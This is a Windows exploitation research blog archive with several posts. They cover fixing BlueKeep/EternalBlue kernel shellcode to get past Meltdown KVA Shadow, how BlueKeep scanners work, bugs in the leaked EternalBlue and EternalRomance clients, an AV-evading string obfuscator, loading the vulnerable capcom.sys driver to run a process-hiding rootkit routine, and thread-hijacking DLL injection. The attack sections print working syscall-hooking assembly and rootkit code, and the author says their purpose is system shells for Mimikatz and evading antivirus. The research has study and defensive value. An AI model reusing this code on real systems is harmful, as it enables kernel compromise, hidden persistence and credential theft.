Thursday, November 7, 2019

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

Background 

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

tl;dr: Side effects of the Meltdown patch inadvertently breaks the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff GitHub

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU Vulnerability 

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors are loading and evaluating and branching ("speculating") way before these operations are "actually" to be run. This can cause effects that can be measured through side channels such as cache timing attacks. Through some clever engineering, exploitation of Meltdown can be abused to read kernel memory from a rogue userland process.

KVA Shadow 

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, known as Kernel Page-Table Isolation (KPTI) on Linux, which are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow Changes 

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

  1. Swap to kernel GS segment
  2. Save user stack to KPCR->Prcb.UserRspShadow
  3. Check if KPCR->Prcb.ShadowFlags first bit is set
    • Set CR3 to KPCR->Prcb.KernelDirectoryTableBase
  4. Load kernel stack from KPCR->Prcb.RspBaseShadow

The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

Existing Remote Kernel Payloads 

The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

Hooking IA32_LSTAR MSR 

In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

One of the easiest, hackiest, and KPP detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

Double Fault Root Cause Analysis 

Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with a UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

We can see that at this point, user mode can see the KiSystemCall64Shadow function:

However, user mode cannot see our shellcode location:

The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!

Hooking KiSystemCall64Shadow 

So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

Heuristic Offset Detection 

We want to accomplish two things:

  1. Install our hook in a spot after kernel pages CR3 is loaded.
  2. Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is 2-bytes long (also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 little endian) as the preceding byte and following byte are stable in all versions of ntoskrnl that I analyzed.

The following shellcode is the 0th stage that runs after exploitation:

payload_start:
; read IA32_LSTAR
    mov ecx, 0xc0000082         
    rdmsr

    shl rdx, 0x20
    or rax, rdx                 
    push rax

; rsi = &KiSystemCall64Shadow
    pop rsi                      

; this loop stores the offset to push 2b into ecx
_find_push2b_start:
    xor ecx, ecx
    mov ebx, 0x652b6a00

_find_push2b_loop:
    inc ecx
    cmp ebx, dword [rsi + rcx - 1]
    jne _find_push2b_loop

This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.

The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.

Atomic x64 Function Hooking 

It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b function!

Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however in all ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes worth of NOP preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:

; install hook call in KiSystemCall64Shadow NOP padding
install_big_jmp:

; 0x905748bf = nop; push rdi; movabs rdi &fake_syscall_hook;
    mov dword [rsi - 0x10], 0xbf485790 
    lea rdi, [rel fake_syscall_hook]
    mov qword [rsi - 0xc], rdi

; 0x57c3 = push rdi; ret;
    mov word [rsi - 0x4], 0xc357

; ... 

fake_syscall_hook:

; ...

Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.

; install tiny jmp to the NOP padding jmp
install_small_jmp:

; rsi = &syscall+push2b
    add rsi, rcx

; eax = jmp -x
; fix -x to actual offset required
    mov eax, 0xfeeb
    shl ecx, 0x8
    sub eax, ecx
    sub eax, 0x1000

; push 2b => jmp -x;
    mov word [rsi], ax        

And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

On the next system call: the kernel stack and page tables will be loaded, our small jmp hook will goto big jmp which will goto our fake syscall handler at PASSIVE_LEVEL.

Cleaning Up the Hook 

Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:

; this syscall hook is called AFTER kernel stack+KVA shadow is setup
fake_syscall_hook:

; save all volatile registers
    push rax
    push rbp
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11

    mov rbp, STAGE_SHARED_MEM

; use lock cmpxchg for queueing APC only one at a time
single_thread_gate:
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl
    jnz _restore_syscall

; only 1 thread has this lock
; allow interrupts while executing ring0 to ring3
    sti
    call r0_to_r3
    cli

; all threads can clean up
_restore_syscall:

; calculate offset to 0x2b using shared storage
    mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]
    mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]
    add rdi, rax

; atomic change small jmp to push 2b
    mov word [rdi], 0x2b6a

All threads restore the push 2b, as the code flow results in less bytes, no extra locking, and shouldn't matter.

Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.

_syscall_hook_done:

; restore register values
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax

; rdi still holds push2b offset!
; but needs to be restored

; do not cause bugcheck 0xc4 arg1=0x91
    mov qword [rsp-0x20], rdi
    pop rdi

; return to &KiSystemCall64Shadow+push2b
    jmp [rsp-0x28]

You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.

Conclusion 

Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours so I'm guessing KPP isn't fast enough just like with the IA32_LSTAR method.

It's simple, it's obvious, it's hacky; but it works and so it's what you want.

Friday, May 31, 2019

Avoiding the DoS: How BlueKeep Scanners Work

Background 

On May 21, @JaGoTu and I released a proof-of-concept GitHub for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep".

Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed.

Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not.

RDP Channel Internals 

The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol.

The basic premise of the vulnerability is that there is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components, and shouldn't receive arbitrary messages.

There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver.

That should be enough information to follow the rest of this post. More background information is available from ZDI.

MS_T120 I/O Completion Packets 

After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind.

The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc. The loop waits via I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver.

Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis.

MS_T120 Port Data Dispatch 

On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts:

We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch:

    0x0 - rdpwsx!HandleConnectProviderIndication
    0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose

If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose.

Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause this to happen.

Patch Detection 

I said almost any message, because if you send the right sized packet, you will ensure that proper cleanup is performed:

It's real simple: If you send a MS_T120 Disconnect Provider (0x2) message that is a valid size, you get proper clean up. There should not be risk of denial-of-service.

The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size!

Vulnerable Host Behavior 

On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to cleanup and close the MS_T120 channel. The server then sends a MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away.

And of course, with an invalid size, you RCE/BSoD.

Patched Host Behavior 

However on a patched host, sending the MS_T120 channel message in the first place is a NOP... with the patch you can no longer bind this channel incorrectly and send messages to it. Therefore, you will not receive any disconnection notice.

In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU, before reporting the host as patched.

CPU Architecture Differences 

Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes between the two architectures, which one might think sending both at once should cause the denial-of-service.

Simply, besides the sizes being different, the message opcode is in a different offset. So on the opposite architecture, with a 0'd out packet (besides the opcode), it will think you are trying to perform the Connect 0x0 message. The Connect 0x0 message requires a much larger message and other miscellaneous checks to pass before proceeding. The message for another architecture will just be ignored.

This difference can possibly also be used in an RCE exploit to detect if the target is x86 or x64, if a universal payload is not used.

Conclusion 

This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch, however it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat and people will use this tool before a crisis.

Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet.

It is my knowledge that the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and I, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology. While this blog post discusses new details about RDP internals related the vulnerability, it does not contain useful information for producing an RCE exploit that is not already widely known.

Saturday, November 24, 2018

Dissecting a Bug in the EternalBlue Client for Windows XP (FuzzBunch)

See Also: Dissecting a Bug in the EternalRomance Client (FuzzBunch)

Background 

Pwning Windows 7 was no problem, but I would re-visit the EternalBlue exploit against Windows XP for a time and it never seemed to work. I tried all levels of patching and service packs, but the exploit would either always passively fail to work or blue-screen the machine. I moved on from it, because there was so much more of FuzzBunch that was unexplored.

Well, one day on a pentest a wild Windows XP appeared, and I figured I would give FuzzBunch a go. To my surprise, it worked! And on the first try.

Why did this exploit work in the wild but not against runs in my "lab"?

tl;dr: Differences in NT/HAL between single-core/multi-core/PAE CPU installs causes FuzzBunch's XP payload to abort prematurely on single-core installs.

Multiple Exploit Chains 

Keep in mind that there are several versions of EternalBlue. The Windows 7 kernel exploit has been well documented. There are also ports to Windows 10 which have been documented by myself and JennaMagius as well as sleepya_.

But FuzzBunch includes a completely different exploit chain for Windows XP, which cannot use the same basic primitives (i.e. SMB2 and SrvNet.sys do not exist yet!). I discussed this version in depth at DerbyCon 8.0 (slides / video).

tl;dw: The boot processor KPCR is static on Windows XP, and to gain shellcode execution the value of KPRCB.PROCESSOR_POWER_STATE.IdleFunction is overwritten.

Payload Methodology 

As it turns out, the exploit was working just fine in the lab. What was failing was FuzzBunch's payload.

The main stages of the ring 0 shellcode performs the following actions:

  1. Obtains &nt and &hal using the now-defunct KdVersionBlock trick
  2. Resolves some necessary function pointers, such as hal!HalInitializeProcessor
  3. Restores the boot processor KPCR/KPRCB which was corrupted during exploitation
  4. Runs DoublePulsar to backdoor the SMB service
  5. Gracefully resumes execution at a normal state (nt!PopProcessorIdle)

Single Core Branch Anomaly 

Setting a couple hardware breakpoints on the IdleFunction switch and +0x170 into the shellcode (after a couple initial XOR/Base64 shellcode decoder stages), it is observed that a multi-core machine install branches differently than the single-core machine.

kd> ba w 1 ffdffc50 "ba e 1 poi(ffdffc50)+0x170;g;"

The multi-core machine has acquired a function pointer to hal!HalInitializeProcessor.

Presumably, this function will be called to clean up the semi-corrupted KPRCB.

The single-core machine did not find hal!HalInitializeProcessor... sub_547 instead returned NULL. The payload cannot continue, and will now self destruct by zeroing as much of itself out as it can and set up a ROP chain to free some memory and resume execution.

Note: A successful shellcode execution will perform this action as well, just after installing DoublePulsar first.

Root Cause Analysis 

The shellcode function sub_547 does not properly find hal!HalInitializeProcessor on single core CPU installs, and thus the entire payload is forced to abruptly abort. We will need to reverse engineer the shellcode function to figure out exactly why the payload is failing.

There is an issue in the kernel shellcode that does not take into account all of the different types of the NT kernel executables are available for Windows XP. Specifically, the multi-core processor version of NT works fine (i.e. ntkrnlamp.exe), but a single core install (i.e. ntoskrnl.exe) will fail. Likewise, there is a similar difference in halmacpi.dll vs halacpi.dll.

The NT Red Herring 

The first operation that sub_547 performs is to obtain HAL function imports used by the NT executive. It finds HAL functions by first reading at offset 0x1040 into NT.

On multi-core installs of Windows XP, this offset works as intended, and the shellcode finds hal!HalQueryRealTimeClock:

However, on single-core installations this is not a HAL import table, but instead a string table:

At first I figured this was probably the root cause. But it is a red herring, as there is correction code. The shellcode will check if the value at 0x1040 is an address in the range within HAL. If not it will subtract 0xc40 and start searching in increments of 0x40 for an address within the HAL range, until it reaches 0x1040 again.

Eventually, the single-core version will find a HAL function, this time hal!HalCalibratePerformanceCounter:

This all checks out and is fine, and shows that Equation Group did a good job here for determining different types of XP NT.

HAL Variation Byte Table 

Now that a function within HAL has been found, the shellcode will attempt to locate hal!HalInitializeProcessor. It does so by carrying around a table (at shellcode offset 0x5e7) that contains a 1-byte length field followed by an expected sequence of bytes. The original discovered HAL function address is incremented in search of those bytes within the first 0x20 bytes of a new function.

The desired 5 bytes are easily found in the multi-core version of HAL:

However, the function on single-core HAL is much different.

There is a similar mov instruction, but it is not a movzx. The byte sequence being searched for is not present in this function, and consequently the function is not discovered.

Conclusion 

It is well known (from many flame wars on Windows kernel development mailing lists) that searching for byte sequences to identify functions is unreliable across different versions and service packs of Windows. We have learned from this bug that exploit developers must also be careful to account for differences in single/multi-core and PAE variations of NTOSKRNL and HAL. In this case, the compiler decided to change one movzx instruction to a mov instruction and broke the entire payload.

It is very curious that the KdVersionBlock trick and a byte sequence search is used to find functions in this payload. The Windows 7 payload finds NT and its exports in, as seen, a more reliable way, by searching backwards in memory from the KPCR IDT and then parsing PE headers.

This HAL function can be found through such other means (it appears readily exported by HAL). The corrupted KPCR can also be cleaned up in other ways. But those are both exercises for the reader.

There is circumstantial evidence that primary FuzzBunch development was started in late 2001. The payload seems maybe it was only written for and tested against multi-core processors? Perhaps this could be a indicator as to how recent the XP exploit was first written. Windows XP was broadly released on October 25, 2001. While this is the same year that IBM invented the first dual-core processor (POWER4), Intel and AMD would not have a similar offering until 2004 and 2005, respectively.

This is yet another example of the evolution of these ETERNAL exploits. The Equation Group could have re-used the same exploit and payload primitives, yet chose to develop them using many different methodologies, perhaps so if one methodology was burned they could continue to reap the benefits of their exploit diversification. There is much esoteric Windows kernel internals knowledge that can be learned from studying these exploits.

Saturday, June 16, 2018

Dissecting a Bug in the EternalRomance Client (FuzzBunch)

Note: This post does not explain the EternalRomance exploit chain, just a quirky bug in the Equation Group's client. For comprehensive exploit details, come see my presentation at DEF CON 26 (August 2018).


Background

In SMBv1, transactions are looked up via their User ID, Tree ID, Process ID, and Multiplex ID fields (UID, TID, PID, MID). This allows a client to have many transactions running at once, as needed. UID and TID are server-assigned, and PID is client-set but usually static. Generally, a client will only use the MID, set to a random value, to distinguish distinct transactions.

Fish in a Barrel

In EternalRomance, the MID must be set to a specific value (File ID). In order for the Equation Group to multiplex multiple transactions, the PID is used instead. The PID is what separates "dynamite sticks" in the Fish-In-A-Barrel heap feng shui.

                                               
Figure 1. Fish in a Barrel (Red: Dynamite - Blue: Fish)

Dynamite are transactions that can (ideally) cause overflow into another transaction. Sometimes a dynamite stick fails, simply because memory allocations can be volatile. In this case, EternalRomance should try the next stick.

Discovering the Bug

I had nop'd out the Srv.sys vulnerability being exploited using WinDbg so that I could observe the network traffic during failures and other various reasons.

I noticed that EternalRomance, during the grooming phase, sent dynamite sticks with PIDs 0, 1, and 2. However, it was only attempting to ignite one PID (dynamite stick) for every execution attempt. The PID 0.

This must be a mistake because igniting the same dynamite 3 times in a row does absolutely nothing but send superfluous network traffic with no change in result. A dynamite stick either works or it simply always will be a dud. And besides, why did it bother to send the other 2 dynamite in the first place?

In fact, igniting the same dynamite stick multiple times is dangerous, because it increments a pointer each time, and the offset for the overwrite (a neighboring MID) stays static. On a side note, I also noticed the first exploit attempt always tries to overwrite two bytes, and all secondary dynamite attempts only overwrite one byte. Because of the way they set up the exploit, only a one byte overwrite is necessary (though two bytes won't hurt if it hits the right place). Another peculiarity.

I messed around with the MaxExploitAttempt settings, which has a default value of 3. I set it to its maximum allowed of 16. Now the PID started at 3?

This time, PIDs 3 through 15 were observed, and the last 3 exploit attempts sent PID=0.

The Binary is Truth

Well some debugging later, I figured out that the InitializeParameters() function (there are no symbols in the binary, but a few functions have helpful debug strings when handling error conditions) was allocating two arrays for the dynamite stick PIDs.

unsigned int size = ExploitStruct->MaxExploitAttempts_0x4360;

if (size <= 16)
{
    ExploitStruct->PidTable_0x44a0 = (PWORD) TbMalloc(2 * size);
    ExploitStruct->PidTable_0x44a4 = (PWORD) TbMalloc(2 * size);
}
else
{
    // print error message: too many max exploit attempts
}

TbMalloc is Equation Group's library function (tibe-2.dll) that just calls malloc() and then memset() to 0 (essentially calloc() but with one argument).

I set a hardware breakpoint on the tables and noticed that in SmbRemoteApiTransactionGroom() (another unnamed function) there was the following logic. This function completes when the dynamite are initially sent (before any are ignited).

if (DynamiteNum >= 3)
{
    ExploitStruct->PidTable_0x44a4[DynamiteNum - 3] = DynamitePid;
}
else
{ 
    ExploitStruct->PidTable_0x44a0[DynamiteNum] = DynamitePid;
}

Later, in DoWriteAndXExploitTransactionForRemApi(), the table where DynamiteNum >= 3 is used to source PIDs to ignite the dynamite.

This means PidTable_0x44a4 is never given values when MaxExploitAttempts=3. Observe 3 shorts set to 0 at the address in the dump.

And we can see the cause for the quirky behavior of the network traffic starting at PID=3, when MaxExploitAttempts=16 (or any greater than 3). Observe several shorts incrementing from 3, followed by three 0.

As far as I can tell, the PidTable_0x44a0 table (the one that holds the first 3 PIDs) simply isn't used, at least when tested against several versions of Windows XP and Server 2003.

Conclusion

This bug was probably missed, by both analysts and the Equation Group, for a few reasons:

  • Fish in a Barrel is only used for older versions of Windows (it's fixed in 7+)
  • It almost always succeeds the first time, as it is a rarely used pre-allocated heap
  • TbMalloc initializes all PID to 0, and the first dynamite PID is 0
  • The bug is quite subtle, I missed it several times because of assumptions

The real mystery is why is there this logic for the second table that isn't used?

Thursday, August 17, 2017

Obfuscated String/Shellcode Generator - Online Tool



String Shellcode |

Shellcode will be cleaned of non-hex bytes using the following algorithm:

s = s.replace(/(0x|0X)/g, "");
s = s.replace(/[^A-Fa-f0-9]/g, "");

See also: Overflow Exploit Pattern Generator - Online Tool.

About this tool

I'm preparing a malware reverse engineering class and building some crackmes for the CTF. I needed to encrypt/obfuscate flags so that they don't just show up with a strings tool. Sure you can crib the assembly and rig this out pretty easily, but the point of these challenges is to instead solve them through behavioral analysis rather than initial assessment. I'm sure this tool will also be good for getting some dirty strings past AV.

Sadly, I'm still not satisfied with the state of C++17 template magic for compile-time string obfuscation or I wouldn't have had to make this. I remember a website that used to do this similar thing for free but at some point it moved to a pay model. I think maybe it had a few extra features?

This instruments pretty nicely though in that an ADD won't be immediately followed by a SUB, which is basically a NOP. Same with XOR, SHIFT, etc. It can also MORPH the output even more by using the current string iteration in the arithmetic to add entropy.

Only ASCII/ANSI is supported because if there's one thing I dislike more than JavaScript it's working with UCS2-LE encodings. And the only language it generates is raw C/C++ because those are the languages you would most likely need something like this for. Post a comment if there's a bug, and feel free to rip the code out if you want to.

Saturday, July 1, 2017

Puppet Strings - Dirty Secret for Windows Ring 0 Code Execution

Update July 3, 2017: FuzzySec has also previously written some info about this.

Ever since I began reverse engineering Shadow Brokers dumps [1] [2] [3], I've gotten into the habit of codenaming my projects. This trick is called Puppet Strings , and it lets you hitch a free ride into Ring 0 (kernel mode) on Windows.

Some nation-state malware, such as Backdoor.Remsec by the ProjectSauron/Strider APT and Trojan.Turla by the Turla APT, performs a similar operation. However, the traditional nation-state modus operandi involves 0-day exploitation.

But why waste 0-days when you can use kn0wn-days?

Premise

  1. If you're running as an elevated admin, you're allowed to load (signed) drivers.
    • Local users are almost always admins.
    • UAC is known to be fundamentally broken.
  2. Load any (signed) driver with a kn0wn code execution vulnerability and exploit it.
    • It's a fairly obvious idea, and elementary to perform.
    • Windows does not have robust certificate revocation.
      • Thus, the DSE trust model is fundamentally broken!

Ordinarily, Ring 0 is forbidden unless you have an approved Extended Validation (EV) Code-Signing Certificate (out of reach for most, especially for malicious purposes). There is a "Driver Signature Enforcement" (DSE) security feature present in all modern 64-bit versions of Windows.

This enforcement can only be "officially" bypassed in two ways: attaching a kernel debugger or configuration at the advanced boot options menu. While these are common procedures for driver developers, they are highly-atypical actions for the average user.

That's right, I'm talking about simply loading high-profile vulnerable drivers like capcom.sys:

Originally introduced in September 2016 as a form of video game anti-cheat, it was quickly discovered that the capcom.sys driver has an ioctl which disables Supervisor Mode Execution Prevention (SMEP) and executes a provided Ring 3 (user mode) function pointer with Ring 0 privileges. It's even kind enough to pass you a function pointer to MmGetSystemRoutineAddress(), which is basically like GetProcAddress() but for ntoskrnl.exe exports.

The unfortunate part is it can still be easily loaded and exploited to this day.

If a driver is signed with a valid timestamp, it also doesn't matter if the certificate has expired, as long as it isn't revoked. This trick is only possible because the Microsoft and root CA mechanisms for revoking driver signatures seems bad. This halfhearted approach violates the trust model that public key infrastructure is supposed to be built upon, as defined in the X.509 standard. Perhaps like UAC it is not a security boundary?

Capcom.sys has been around for almost a year, and is easily one of the most well-known and simplest driver exploits of all time.

While this driver is flagged 15/61 on VirusTotal, I have a personal list of known-vulnerable drivers that are 0/61 detection. They aren't too hard to find if you keep your eyes open to netsec news.

Proof of Concept

Code is available on GitHub at zerosum0x0/puppetstrings. To run it, you will need to independently obtain the capcom.sys driver (I don't want to deal with weird licensing issues).

Test system was Windows 10 x64 Redstone 3 (Insider pre-release), just to show the new Driver Signing Policies (and its list of exceptions) introduced in Redstone 1 do not address this issue. This works on all versions of Windows if you update the EPROCESS.ActiveProcessLinks offset.

1: kd> dt !_EPROCESS ActiveProcessLinks
   +0x2e8 ActiveProcessLinks : _LIST_ENTRY

For the PoC, I had to do something relatively malicious to get the point across. Getting to Ring 0 with this technique is simple, doing something interesting once there is more difficult (e.g. we can already load drivers, the usual SYSTEM shell can be obtained through less dangerous methods).

I load capcom.sys, pass it a function which performs the old rootkit technique of unlinking the current process from the EPROCESS.ActiveProcessLinks circularly-linked list, and then unload capcom.sys. This methodology is instant and makes the current process not show up in user mode tools like tasklist.exe.

static void rootkit_unlink(PEPROCESS pProcess)
{
 static const DWORD WIN10_RS3_OFFSET = 0x2e8;

 PLIST_ENTRY plist = 
  (PLIST_ENTRY)((LPBYTE)pProcess + WIN10_RS3_OFFSET);

 *((DWORD64*)plist->Blink) = (DWORD64)plist->Flink;
 *((DWORD64*)plist->Flink + 1) = (DWORD64)plist->Blink;

 plist->Flink = (PLIST_ENTRY) &(plist->Flink);
 plist->Blink = (PLIST_ENTRY) &(plist->Flink);
}

Of course, doing this in a modern rootkit is foolish, as PatchGuard has at least 4 different process list checks (CRITICAL_STRUCTURE_CORRUPTION Bug Check Arg4 = 4, 5, 1A, and 1B). But you can get experimental and think of something else cool to do, as you enjoy all of the freedoms Ring 0 brings.

DOUBLEPULSAR showed us there's a lot of creative ideas to run in the kernel, even outside of a driver context. DSEFix exploits the same vulnerable VirtualBox driver used by Trojan.Turla to disable Driver Signature Enforcement entirely. It's even possible to use some undocumented features to create a reflectively-loaded driver, if one were so inclined...

If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

ThreadContinue - Reflective DLL Injection Using SetThreadContext() and NtContinue()

In the attempt to evade AV, attackers go to great lengths to avoid the common reflective injection code execution function, CreateRemoteThread(). Alternative techniques include native API (ntdll) thread creation and user APCs (necessary for SysWow64->x64), etc.

This technique uses SetThreadContext() to change a selected thread's registers, and performs a restoration process with NtContinue(). This means the hijacked thread can keep doing whatever it was doing, which may be a critical function of the injected application.

You'll notice the PoC (x64 only, #lazy) is using the common VirtualAllocEx() and WriteVirtualMemory() functions. But instead of creating a new remote thread, we piggyback off of an existing one, and restore the original context when we're done with it. This can be done locally (current process) and remotely (target process).

Stage 0: Thread Hijack

Code can be found in hijack/hijack.c

  1. Select a target PID.
  2. Process is opened, and any thread is found.
  3. Thread is suspended, and thread context (CPU registers) copied.
  4. Memory allocated in remote process for reflective DLL.
  5. Memory allocated in remote process for thread context.
  6. Set the thread context stack pointer to a lower address.
  7. Change thread context with SetThreadContext().
  8. Resume the thread execution.

Stage 1: Reflective Restore

Code can be found in dll/ReflectiveDll.c

  1. Normal reflective DLL injection takes place.
  2. Optional: Spawn new thread locally for a primary payload.
  3. Optional: Thread is restored with NtContinue(), using the passed-in previous context.

You can go from x64->SysWow64 using Wow64SetThreadContext(), but not the other way around. I unfortunately did not observe possible sorcery for SysWow64->x64.

One major hiccup to overcome, in x64 mode, is that the register RCX (function param 1) is volatile even across a SetThreadContext() call. To overcome this, I stored a cave (in this case, the DOS header). Luckily, NtContinue() allows setting the volatile registers, so there's no issues in the restoration process, otherwise it would have needed a hacky code cave inserted or something.

    // retrieve CONTEXT from DOS header cave
    lpParameter = (LPVOID)*((PULONG_PTR)((LPBYTE)uiLibraryAddress+2));

Another issue is we could corrupt the original threads stack. I subtracted 0x2000 from RSP to find a new spot to spam up.

